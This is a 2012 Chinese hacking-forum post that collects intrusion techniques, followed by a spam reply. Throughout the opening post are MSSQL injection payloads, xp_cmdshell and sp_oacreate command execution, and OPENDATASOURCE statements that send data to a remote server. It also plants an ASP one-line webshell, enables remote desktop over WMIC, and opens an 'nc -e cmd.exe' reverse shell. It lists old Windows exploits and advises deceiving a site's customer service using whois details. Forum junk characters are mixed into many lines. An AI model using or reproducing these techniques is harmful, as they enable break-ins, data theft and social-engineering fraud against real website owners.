找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3340|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
4 r) H4 p* W/ z4 A$ ?1 b6 @8 D' a# F4 i0 b8 a0 [+ f+ }. _' s& I# u
) K$ Z6 m* I+ g
SA点数据库分离搞法+语句:6 [8 W2 h( H! s  }- }& h& l+ l
: z3 \# n4 O# m8 k" s/ y$ h
注射点不显错,执行下面三条语句页面都返回正常。9 W% z: l" S5 U7 i5 I
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
1 I' M! p& f" |$ [and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
! C7 D, l. j+ ?( _& x) M0 i: uand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
9 P( P, Z' y' e/ a7 i可以列目录,判断系统为2000,web与数据库分离
+ ~, A( u% F# ]8 l遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
" @' u# T4 Y; n( w; U: m9 g; D在注射点上执行( Y, U5 V1 J1 j& v  t
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--. t6 ]& o- p/ t5 g$ ?  L
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
; s0 f+ `) y# L) z4 A# b还有我用NC监听得其他端口都没有得到IP。
6 ^9 x7 \2 N/ T$ A9 w
( |( R* Y7 g! v通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
2 @9 Z4 [3 T$ W1 {9 s7 d1 m+ N'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
3 b  q' ^) s4 a3 F% l' Z+ {& X# A  n
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
! I& K) W* D. F1 z0 {, P! l  r
' Z; r+ B; i8 u: z: Q1 ?( _5 ^现在就猜想是不是数据库是内网而且不能连外网。0 C0 e5 S) c) I( f+ s5 t6 P

2 I% i) y: N6 U' \. z/ @) w. Q# `7 m' W) }/ _- U
access导出txt文本代码4 I/ R  X4 m4 j1 }7 m" g
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
! q7 [6 G! `8 c
7 x+ }# T! M7 L# f, }
% ?& i8 }% A1 w
& f3 b, p9 Q% U; y+ O自动跳转到指定网站代码头
" F& G$ b$ W/ f' m9 d<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
. L+ {  ^  T5 \- c, r( e. F. I5 D4 j

8 w+ u" T# G& ?0 E4 r入侵java or jsp站点时默认配置文件路径:/ w6 L+ Q  k$ W8 [- U
\web-inf\web.xml) ^( H; n# \& [# d7 c
tomcat下的配置文件位置:
8 z1 X! C% Z9 Z9 E\conf\server.xml            (前面加上tomcat路径)% u7 w! a5 v/ S. h' _0 T3 P3 @$ S7 Y
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml# D+ B9 J! i$ T7 o2 \7 Y
& D" h, K; @* K4 {

* O0 C7 i& I4 D% K# o2 H+ _% x
0 [1 [/ E& g& [4 ^$ `检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
: k6 a0 g/ a( l7 M7 m2 g6 H/ t-1%23
% n$ q5 p6 X9 q/ J6 w" N> # u; Z& V  K2 J' ~2 E; r6 ]; K
<
& E' m5 o0 d/ H% R+ g1'+or+'1'='1
& a& ?" @; c  n- o, h9 jid=8%bf* o" W( y& v6 F3 G' d% r7 C
" l: \+ x8 S; X, N& B, T
全新注入点检测试法:9 \- d& J2 ~9 u5 L
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
: f9 q: v& L) @  R, l+ |" q% P/ A7 ~
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。& t# o/ V5 s9 u/ D

; t& {4 {$ K6 e5 H5 [搜索型注入判断方法:
6 w$ u1 o' Q) m, g7 [$ e北京%' and '1'='1' and '%'='
; S. t7 a7 _+ h6 @! w北京%' and '1'='2' and '%'='
" t+ _8 E, s" T) n8 }" R
! H( D% D7 w( P) U; W; B: i  Z
& T* N1 b- }, J. \% `0 UCOOKIES注入:9 E7 W7 f1 a- Z2 n! C

6 F% t, f9 S& A: njavascript:alert(document.cookie="id="+escape("51 and 1=1"));, ]( b+ F1 S* V- f) V
, E! g) _/ q3 t& T- L. ~
2000专业版查看本地登录用户命令:) Y/ E% Z& D" ^8 ?1 n; O4 \
net config workstation
, `7 f8 U+ w( H( @. _! L
+ q  `/ n% k# t. i7 a
+ q5 L! q4 ^  M) h0 L$ ]/ N2003下查看ipsec配置和默认防火墙配置命令:
. \" f; a. f0 _1 C: l7 b7 _netsh firewall show config
+ ?: X! U9 c% y9 Onetsh ipsec static show all
/ j3 u& F$ [5 m, ?. C$ U  C$ I& l* L' f3 F
不指派指定策略命令:
/ X: z' _  ]/ knetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
& c( \6 c3 |' v$ Znetsh ipsec static show policy all  显示策略名% u- D' v+ w3 A( d8 ]' Y* v* ]1 }. L

* Z8 o/ {- S" ?9 @) J
6 a5 I" ?( C# {. j猜管理员后台小技巧:& H! Q: I5 T' Z& |
admin/left.asp
2 J. V8 A8 O0 p$ nadmin/main.asp2 Y! [9 S0 l+ G* ?2 A
admin/top.asp, Y# X$ y0 ]/ g. B
admin/admin.asp
7 f/ }3 }. w' p* G2 [: {8 E会现出菜单导航,然后迅雷下载全部链接
2 S7 \# [, c8 X( b) I( x4 h3 y5 V( d: n+ y" G7 ?1 B
+ v. |2 [& p7 [. X/ q0 j
社会工程学:
& ]: j+ |/ \& |' a用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
$ d3 ^& k: b8 \& j然后去骗客服
+ v( N9 b1 q+ O$ c% q: {, S" R/ v% W& L
! c2 `- E; k2 d
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: . Z* E$ m! }" ~+ U' @
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, 2 @6 O5 ?, e% {7 E" v# o
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。8 M- @3 d5 ]/ A" R) D7 ?

# a8 K8 t1 h& ^% Q! \7 d% n2 K3 m. {' _; t+ u2 F  O3 }# R

4 f5 j- @( }6 p5 p! U7 l) Q+ n6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查), A/ _. z' q! y  k6 k+ Y3 c6 M) c
& N' z! p5 b; r# A1 `, w

( |2 S; l$ {+ M& |7 J' b* R
6 d/ ?3 Y  C4 _5 k& GCMD加密注册表位置( m; V4 Y9 y( q$ U/ z, O( s
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
4 W  h' t" u7 Y% T/ X7 g- tAutoRun3 z4 D2 K7 q( H9 U8 J3 F" m  p& j
2 O( x% ^0 Z6 I5 Q
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
' g" y8 r3 l; ~+ e* ?8 }9 kAutoRun' M3 o3 t% Q7 i  U
; O& [+ u: R$ n9 _, A6 i
, G- b' ]4 O0 \0 V* J/ Q
在找注入时搜索Hidden,把他改成test
* h& W8 a$ B1 x2 P9 N0 H! u
% v1 z0 d2 r+ g6 H: _& e
0 l5 P8 Z; q0 l7 W2 W6 |8 |9 S7 F/ }" J5 B: P, h2 U, s; \$ c+ g
mstsc /v:IP /console
5 p, n9 h% z5 |0 r1 g# C  N2 m' U+ I- _3 [5 l/ ^( I
8 {8 o! ]" c8 H6 B: d# B. ^" Q
一句话开3389:  s$ T  Y! [; z. v0 T0 a

8 c) b. C, N" @+ r; T0 v0 x& C# j最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  3 `3 ]( g2 R+ Z* g
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
( ^0 J% ]5 j0 ?" z* b/ }/ T: W/ o% t% Z  q; d5 O  x& z9 ]) i, \4 m  K6 s

" W4 x0 W* r" c- d" t2 m- V知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
$ q% `* r/ j+ x$ p- B. WInsert into admin(user,pwd) values('test','test')6 K/ Z+ B( y& S/ l, s4 j8 M: e
) U) k7 A* ^0 J

8 L4 q3 }2 ~/ a  m/ T/ x2 lNC反弹
2 v- }# T+ q# p' w* I! @先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
* b, o, \$ `- C) }5 c1 g然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
0 x1 q1 D- E% A- _; B+ M3 @) W9 @; p! J7 z/ y$ y
) M$ }. s% l5 E( p7 Q2 ]
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
/ H5 N8 i) l' y& R
% c$ g0 Y* V: ~9 ^1 ^+ \- l$ @有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录" A9 ~- M) B/ }1 w# q' x2 M7 }
例如:$ D$ o$ L; B! V! L
subst k: d:\www\ 用d盘www目录替代k盘
0 G( |/ ^* Z5 A: @- y& V7 I+ k8 @subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表